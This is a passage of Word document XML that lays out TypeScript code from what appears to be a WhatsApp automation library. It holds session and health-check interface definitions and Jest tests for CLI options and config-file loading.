          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  OS?: string;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  START_TS?: number;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  PHONE_VERSION?: string;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  NUM_HASH?: string;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  PATCH_HASH?: string;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  OW_KEY?: string;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  INSTANCE_ID?: string;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  RAM_INFO?: string;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  PPTR_VERSION?: string;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  LATEST_VERSION ?: boolean;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  CLI ?: boolean;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  ACC_TYPE ?: 'PERSONAL' | 'BUSINESS';</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export interface HealthCheck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number of messages queued up in the browser. Messages can start being queued up due to the web app awaiting a connection with the host device.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queuedMessages?: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state of the web app.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'CONNECTED'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state?: STATE;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Whether or not the "Phone is disconnected" message is showing within the web app.</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isPhoneDisconnected?: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"Use Here" button is not detected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isHere?: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the `WAPI` object is detected.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wapiInjected?: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Result of `window.navigator.onLine`</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online?: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"trying to reach phone" dialog is detected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tryingToReachPhone?: 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the number of seconds the "Retrying in ..." dialog is indicating. If the dialog is not showing, it will return `0`.</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retryingIn?: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Returns `true` if "Phone battery low" message is detected</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Healthy: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batteryLow ?: boolean;</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packages/legacy-documented/src/api/model/sessionInfo.ts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packages/legacy-documented/src/cli/__tests__/cli-options.test.ts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Tests for packages/core/src/cli/cli-options.ts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These tests verify the CLI option definitions are correct.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describe('CLI Options',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export optionList array',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expect(Array.isArray(optionList)).toBe(true);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        expect(optionList.length).toBeGreaterThan(0);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required properties for each option',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optionList.forEach(option =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">            expect(option).toHaveProperty('name');</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">            expect(typeof option.name).toBe('string');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essential CLI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optionNames = optionList.map(o =&gt; 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Core options</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        expect(optionNames).toContain('port');</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        expect(optionNames).toContain('config');</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        expect(optionNames).toContain('session');</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        expect(optionNames).toContain('webhook');</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        expect(optionNames).toContain('license-key');</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        expect(optionNames).toContain('help');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correct type for port option',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portOption = optionList.find(o =&gt; o.name === 'port');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expect(portOption).toBeDefined();</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        expect(portOption?.type).toBe(Number);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        expect(portOption?.default).toBe(8002);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        expect(portOption?.alias).toBe('p');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correct type for config option',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configOption = optionList.find(o =&gt; o.name === 'config');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expect(configOption).toBeDefined();</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        expect(configOption?.type).toBe(String);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        expect(configOption?.alias).toBe('c');</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correct type for boolean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booleanOptions = ['no-api', 'verbose', 'socket', 'debug', 'cors'];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booleanOptions.forEach(name =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">            const option = optionList.find(o =&gt; o.name === name);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">            if (option &amp;&amp; option.type) {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">                expect(option.type).toBe(Boolean);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descriptions for all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optionList.forEach(option =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">            // description is optional for 'help'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">            if (option.name !== 'help') {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">                expect(option.description).toBeDefined();</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">                expect(typeof option.description).toBe('string');</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">                expect(option.description!.length).toBeGreaterThan(0);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unique aliases',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aliases = optionList</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">            .filter(o =&gt; o.alias)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">            .map(o =&gt; o.alias);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uniqueAliases = new Set(aliases);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        expect(aliases.length).toBe(uniqueAliases.size);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unique option names',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names = optionList.map(o =&gt; o.name);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        const uniqueNames = new Set(names);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expect(names.length).toBe(uniqueNames.size);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chatwoot integration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optionNames = optionList.map(o =&gt; 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expect(optionNames).toContain('chatwoot-url');</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        expect(optionNames).toContain('chatwoot-api-access-token');</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        expect(optionNames).toContain('force-update-cw-webhook');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tunnel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optionNames = optionList.map(o =&gt; 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expect(optionNames).toContain('tunnel');</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        expect(optionNames).toContain('cf-tunnel-host-domain');</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        expect(optionNames).toContain('cf-tunnel-namespace');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security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const optionNames = optionList.map(o =&gt; o.name);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expect(optionNames).toContain('key');</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        expect(optionNames).toContain('helmet');</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        expect(optionNames).toContain('allow-ips');</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        expect(optionNames).toContain('privkey');</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        expect(optionNames).toContain('cert');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isMultiple flag for array options',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efOption = optionList.find(o =&gt; o.name === 'ef');</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        expect(efOption).toBeDefined();</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        expect((efOption as any)?.isMultiple).toBe(true);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allowIpsOption = optionList.find(o =&gt; o.name === 'allow-ips');</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        expect(allowIpsOption).toBeDefined();</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        expect((allowIpsOption as any)?.isMultiple).toBe(true);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have default values for options with defaults', async () =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        const { optionList } = await import('../cli-options');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optionsWithDefaults = optionList.filter(o =&gt; o.default !== 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expect(optionsWithDefaults.length).toBeGreaterThan(0);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specific defaults</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        const portOption = optionList.find(o =&gt; o.name === 'port');</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        expect(portOption?.default).toBe(8002);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hostOption = optionList.find(o =&gt; o.name === 'host');</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        expect(hostOption?.default).toBe('localhost');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generateApiDocsOption = optionList.find(o =&gt; o.name === 'generate-api-docs');</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        expect(generateApiDocsOption?.default).toBe(true);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packages/legacy-documented/src/cli/__tests__/cli-options.test.ts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packages/legacy-documented/src/cli/__tests__/file-utils.test.ts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Tests for packages/core/src/cli/file-utils.ts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These tests are isolated and don't depend on the heavy core library imports.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describe('File Utils - tryOpenFileAsObject()', () =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    const tmpDir = path.join(__dirname, '__tmp_file_utils__');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undefined for non-existent file', async () =&gt;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tryOpenFileAsObject('/non/existent/path/config.json');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JSON config file', async () =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        const configPath = path.join(tmpDir, 'test.json');</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        const testConfig = { sessionId: 'test', port: 8080 };</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        fs.writeFileSync(configPath, JSON.stringify(testConfig));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expect(result.sessionId).toBe('test');</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">            expect(result.port).toBe(8080);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">            expect(result.confPath).toBe(configPath);</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JS config with plain object default export', async () =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        const configPath = path.join(tmpDir, 'config-obj.js');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w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    sessionId: 'js-object',</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    port: 9000</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expect(result.sessionId).toBe('js-object');</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">            expect(result.port).toBe(9000);</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 Clear require cache</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">            delete require.cache[require.resolve(configPath)];</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execute sync function default export', async () =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        const configPath = path.join(tmpDir, 'config-sync-fn.js');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function(sessionId)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sessionId: 'sync-fn-' + sessionId,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        computed: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process.env.CURRENT_SESSION_ID = 'my-session';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expect(result.sessionId).toBe('sync-fn-my-session');</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">            expect(result.computed).toBe(true);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delete require.cache[require.resolve(configPath)];</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">            delete process.env.CURRENT_SESSION_ID;</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execute async function default export', async () =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        const configPath = path.join(tmpDir, 'config-async-fn.js');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async function(sessionId) {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    // Simulate async work</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    await new Promise(resolve =&gt; setTimeout(resolve, 10));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sessionId: 'async-fn-' + sessionId,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        async: true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process.env.CURRENT_SESSION_ID = 'async-test';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expect(result.sessionId).toBe('async-fn-async-test');</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">            expect(result.async).toBe(true);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delete require.cache[require.resolve(configPath)];</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">            delete process.env.CURRENT_SESSION_ID;</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needArray parameter correctly', async () =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        const configPath = path.join(tmpDir, 'array-config.json');</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
